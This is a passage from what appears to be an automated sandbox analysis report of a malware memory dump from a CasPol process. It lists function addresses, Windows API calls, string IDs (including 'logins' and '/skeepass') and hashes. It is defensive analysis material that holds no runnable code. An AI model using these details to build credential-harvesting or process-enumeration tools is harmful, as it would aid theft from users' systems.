                                                                                                                                                                                    • memset.MSVCRT ref: 0040806A
                                                                                                                                                                                    • memset.MSVCRT ref: 0040807F
                                                                                                                                                                                    • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                                                    • memset.MSVCRT ref: 004081E4
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                                                      • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                      • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                                                                                                    • String ID: logins$null
                                                                                                                                                                                    • API String ID: 2148543256-2163367763
                                                                                                                                                                                    • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                    • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                                                                                    Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                    • memset.MSVCRT ref: 004085CF
                                                                                                                                                                                    • memset.MSVCRT ref: 004085F1
                                                                                                                                                                                    • memset.MSVCRT ref: 00408606
                                                                                                                                                                                    • strcmp.MSVCRT ref: 00408645
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                                                                                    • memset.MSVCRT ref: 0040870E
                                                                                                                                                                                    • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004087A6
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                    • String ID: ---
                                                                                                                                                                                    • API String ID: 3437578500-2854292027
                                                                                                                                                                                    • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                                                    • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                                                    • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                                                    Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0041087D
                                                                                                                                                                                    • memset.MSVCRT ref: 00410892
                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                    • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                    • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                    • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1010922700-0
                                                                                                                                                                                    • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                    • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                                                                                    Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                    • malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                    • free.MSVCRT ref: 004186C7
                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                                                    • free.MSVCRT ref: 004186E0
                                                                                                                                                                                    • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                                                    • malloc.MSVCRT ref: 004186FE
                                                                                                                                                                                    • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                                                    • free.MSVCRT ref: 00418716
                                                                                                                                                                                    • free.MSVCRT ref: 0041872A
                                                                                                                                                                                    • free.MSVCRT ref: 00418749
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                                                    • String ID: |A
                                                                                                                                                                                    • API String ID: 3356672799-1717621600
                                                                                                                                                                                    • Opcode ID: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
                                                                                                                                                                                    • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                                                    • Opcode Fuzzy Hash: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
                                                                                                                                                                                    • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                                                    Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsicmp
                                                                                                                                                                                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                    • API String ID: 2081463915-1959339147
                                                                                                                                                                                    • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                    • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                    • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                                                    Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW,7570CFBC,?,00413396), ref: 004138ED
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                    • API String ID: 2012295524-70141382
                                                                                                                                                                                    • Opcode ID: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                                                                                                                                                                    • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                                                    • Opcode Fuzzy Hash: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                                                    Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,7570CFBC), ref: 00413865
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                    • API String ID: 667068680-3953557276
                                                                                                                                                                                    • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                    • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                                                    • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                    • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                                                    Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                    • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                    • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                    • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                                      • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                                      • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                      • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                    • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1700100422-0
                                                                                                                                                                                    • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                    • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                                                    • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                                                    Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                                    • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                                    • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 552707033-0
                                                                                                                                                                                    • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                    • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                                                    • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                                                    Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040C0A4
                                                                                                                                                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                                      • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                      • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                                                                    • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                                    • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                                    • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                                    • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                                    • String ID: 4$h
                                                                                                                                                                                    • API String ID: 4066021378-1856150674
                                                                                                                                                                                    • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                    • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                    • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                                                    Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_snwprintf
                                                                                                                                                                                    • String ID: %%0.%df
                                                                                                                                                                                    • API String ID: 3473751417-763548558
                                                                                                                                                                                    • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                    • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                                                    • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                                                    Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                                    • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                                    • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                                                    • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                                    • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                                    • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                                    • String ID: A
                                                                                                                                                                                    • API String ID: 2892645895-3554254475
                                                                                                                                                                                    • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                    • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                    • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                                                    Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                                                      • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                                                      • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                                      • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                                                      • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                                                    • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                                                    • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                                                    • memset.MSVCRT ref: 0040DA23
                                                                                                                                                                                    • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                                                    • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                                                    • DestroyWindow.USER32(00000005), ref: 0040DA70
